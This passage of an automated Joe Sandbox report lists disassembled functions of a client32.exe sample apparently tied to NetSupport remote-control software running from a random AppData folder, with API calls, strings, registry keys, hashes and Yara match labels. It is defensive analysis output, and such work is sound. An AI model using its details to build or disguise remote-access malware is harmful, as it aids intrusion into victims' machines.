                                                                                    • Part of subcall function 6FA07BE0: _memset.LIBCMT ref: 6FA07BFF
                                                                                    • Part of subcall function 6FA07BE0: _strncpy.LIBCMT ref: 6FA07C0B
                                                                                    • Part of subcall function 6F9FA4E0: EnterCriticalSection.KERNEL32(6FA3B898,00000000,?,?,?,6F9FDA7F,?,00000000), ref: 6F9FA503
                                                                                    • Part of subcall function 6F9FA4E0: InterlockedExchange.KERNEL32(?,00000000), ref: 6F9FA568
                                                                                    • Part of subcall function 6F9FA4E0: Sleep.KERNEL32(00000000,?,6F9FDA7F,?,00000000), ref: 6F9FA581
                                                                                    • Part of subcall function 6F9FA4E0: LeaveCriticalSection.KERNEL32(6FA3B898,00000000), ref: 6F9FA5B3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$CountEnterExchangeInterlockedLeaveSleepTick_memset_strncpy
                                                                                  • String ID: 1.2$Channel$Client$Publish %d pending services
                                                                                  • API String ID: 1112461860-1140593649
                                                                                  • Opcode ID: 1952d0a92e991f1744fc61f2d38042008b92e33d127bdd6e9e535099e9e30b92
                                                                                  • Instruction ID: a20f6dede7320631e16e9ab6563747698ac986a995d9eb86ec60b6a0f10535fd
                                                                                  • Opcode Fuzzy Hash: 1952d0a92e991f1744fc61f2d38042008b92e33d127bdd6e9e535099e9e30b92
                                                                                  • Instruction Fuzzy Hash: 64518076A047259ADB20EE78FC5079A77E5AB1332CF18812AD851C3381DB39E4D6CB52
                                                                                  Function 11103630 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 11103683
                                                                                  • GetStockObject.GDI32(00000004), ref: 111036DB
                                                                                  • RegisterClassA.USER32(?), ref: 111036EF
                                                                                  • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 1110372C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                                  • String ID: NSMDesktopWnd
                                                                                  • API String ID: 2669163067-206650970
                                                                                  • Opcode ID: 3079baf332cc25a70c3d3df9c832fc0325efe936172018c4c3e6d8e20cf8610c
                                                                                  • Instruction ID: a046934e961b92c42b42225909fe4a4d9db65d03d00dbebfa88e6fdde24b4f4f
                                                                                  • Opcode Fuzzy Hash: 3079baf332cc25a70c3d3df9c832fc0325efe936172018c4c3e6d8e20cf8610c
                                                                                  • Instruction Fuzzy Hash: E031F4B4D01719AFCB44CFA9D980AAEFBF8FB08314F50462EE42AE3244E7355900CB94
                                                                                  Function 11145F00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 11145FD4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseOpen
                                                                                  • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                  • API String ID: 47109696-3245241687
                                                                                  • Opcode ID: a2c2ae4e5c4c2a275a787743371364b614ebaa02131a0ba05eddfad67ef0d136
                                                                                  • Instruction ID: 1d1f817806b548678a0140876f7b35b9e852c49707e53231e183cf95c3cf5809
                                                                                  • Opcode Fuzzy Hash: a2c2ae4e5c4c2a275a787743371364b614ebaa02131a0ba05eddfad67ef0d136
                                                                                  • Instruction Fuzzy Hash: 1E21DD71E0022A9BE764DA64CD80FDEF778AB45718F1041AAE81DF3941D7319D458BA3
                                                                                  Function 111121E0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 11112140: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111216A
                                                                                    • Part of subcall function 11112140: __wsplitpath.LIBCMT ref: 11112185
                                                                                    • Part of subcall function 11112140: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111121B9
                                                                                  • GetComputerNameA.KERNEL32(?,?), ref: 11112288
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                                  • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                  • API String ID: 806825551-1858614750
                                                                                  • Opcode ID: 48ba6f8863ffcd44e27bad5e20faa5f1087748d5dcdcaea7fc0175279a4e57c4
                                                                                  • Instruction ID: ca260b95ce0435fc80d5678de4b29a4f2f4f697687454b99fdfeb2ddb07782e0
                                                                                  • Opcode Fuzzy Hash: 48ba6f8863ffcd44e27bad5e20faa5f1087748d5dcdcaea7fc0175279a4e57c4
                                                                                  • Instruction Fuzzy Hash: C62149B6A042855AD701CE70DD80BFFFFAADB8A204F1445B8D851CB545E736D604C390
                                                                                  Function 11144DD0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 111447F0: GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
                                                                                    • Part of subcall function 111447F0: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe,00000104,?,11144A43,?), ref: 11144819
                                                                                  • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144E25
                                                                                  • ResetEvent.KERNEL32(00000270), ref: 11144E39
                                                                                  • SetEvent.KERNEL32(00000270), ref: 11144E4F
                                                                                  • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144E5E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                                  • String ID: MiniDump
                                                                                  • API String ID: 1494854734-2840755058
                                                                                  • Opcode ID: 105b93f749375231fdcb9b481c982d061f92632bc0342d7f03e4e2231c0d94ee
                                                                                  • Instruction ID: ea994b22643fb5a56552c53957c3f10a02c9a0f0123a866c2d557df6367c4d32
                                                                                  • Opcode Fuzzy Hash: 105b93f749375231fdcb9b481c982d061f92632bc0342d7f03e4e2231c0d94ee
                                                                                  • Instruction Fuzzy Hash: 1F112975A8412577E710DBA8DC81F9BF768AB04B28F200230E634E7AC4EB74A50587A1
                                                                                  Function 6F9F8E28 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 64COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6F9F5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6F9F5014
                                                                                    • Part of subcall function 6F9F5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6F9F8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6F9F5034
                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6F9F8EAE
                                                                                  • FreeLibrary.KERNEL32(?), ref: 6F9F8EBF
                                                                                    • Part of subcall function 6F9F2420: _strrchr.LIBCMT ref: 6F9F242E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressCloseFileFreeHandleLibraryModuleNameProc_strrchr
                                                                                  • String ID: NSM247Ctl.dll$Set Is247=%d$pcictl_247.dll
                                                                                  • API String ID: 3215810784-3459472706
                                                                                  • Opcode ID: 5857796ff0fbba24b0d2863d023895a88d0872ff4024b0df93016c9c155be276
                                                                                  • Instruction ID: 7e77fbdb428eacfecb2edb042341e674f8de646fb306a92b52a402fd33998dfc
                                                                                  • Opcode Fuzzy Hash: 5857796ff0fbba24b0d2863d023895a88d0872ff4024b0df93016c9c155be276
                                                                                  • Instruction Fuzzy Hash: 34113832E053259FEF259A62DC41FEE73A8AB45315F004466DE0AE31C0EB70E946CB61
                                                                                  Function 111479B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 111479DF
                                                                                  • wsprintfA.USER32 ref: 11147A16
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                  • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                  • API String ID: 1985783259-2296142801
                                                                                  • Opcode ID: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
                                                                                  • Instruction ID: f4f04ea69c0c381d0959b313e9907706ba85fe26c30e15a9a088fcfc7c116df7
                                                                                  • Opcode Fuzzy Hash: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
                                                                                  • Instruction Fuzzy Hash: 6811E5FAE00218A7D710DEA49D81FEAF36C9B44608F100165FB08F6141EB70AA05CBE4
                                                                                  Function 111101B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 111101C9
                                                                                    • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                    • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                    • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                  • wsprintfA.USER32 ref: 111101E4
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  • _memset.LIBCMT ref: 11110207
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
                                                                                  • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                                  • API String ID: 3234921582-2664294811
                                                                                  • Opcode ID: 280ad6f88800d969d30347863d68ea4ddbfee66c9be73721bdded0e9d7f91acb
                                                                                  • Instruction ID: 098e5996781ad60247c7fcf5caa4ca36f886f8102b778af333740a2f918ca33d
                                                                                  • Opcode Fuzzy Hash: 280ad6f88800d969d30347863d68ea4ddbfee66c9be73721bdded0e9d7f91acb
                                                                                  • Instruction Fuzzy Hash: C0F0F6B6E4022863C7209AA49D01FEFF37C9F91609F0001A9FE05B7241EA75AA11C7E5
                                                                                  Function 111466B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,76938400), ref: 11145CA0
                                                                                    • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                    • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                    • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                                  • LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030D50,00000002), ref: 111466CF
                                                                                  • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 111466E1
                                                                                  • FreeLibrary.KERNEL32(00000000,?,11030D50,00000002), ref: 111466F4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Library$AddressFreeLoadOpenProcVersion_memset_strncpy
                                                                                  • String ID: SetProcessDpiAwareness$shcore.dll
                                                                                  • API String ID: 1108920153-1959555903
                                                                                  • Opcode ID: e3234517993a23a489bcd726e27309146a97354540acbce9dede09c4332e6aa4
                                                                                  • Instruction ID: b4913e853cd1401fb26aad2e9137c069c6cdc321efb83b495f2c8eb55c4c44ed
                                                                                  • Opcode Fuzzy Hash: e3234517993a23a489bcd726e27309146a97354540acbce9dede09c4332e6aa4
                                                                                  • Instruction Fuzzy Hash: CDF0A03A781225A3E51912AABD58B9ABB5C9BC1A7EF150230F929D6DC0DB50C50082B5
                                                                                  Function 11031F30 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 78COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • wsprintfA.USER32 ref: 11031FE6
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                  • String ID: %s%s.bin$648351$clientinv.cpp$m_pDoInv == NULL
                                                                                  • API String ID: 4180936305-314825743
                                                                                  • Opcode ID: bd07d82e204d55fca40885ac61f8c39d8728cbd3a2f7a07743be8c59493d1746
                                                                                  • Instruction ID: 4b30c984cb9feb044c1d7ab8c0844ab34c920fbc261825ed793c706054f3ad77
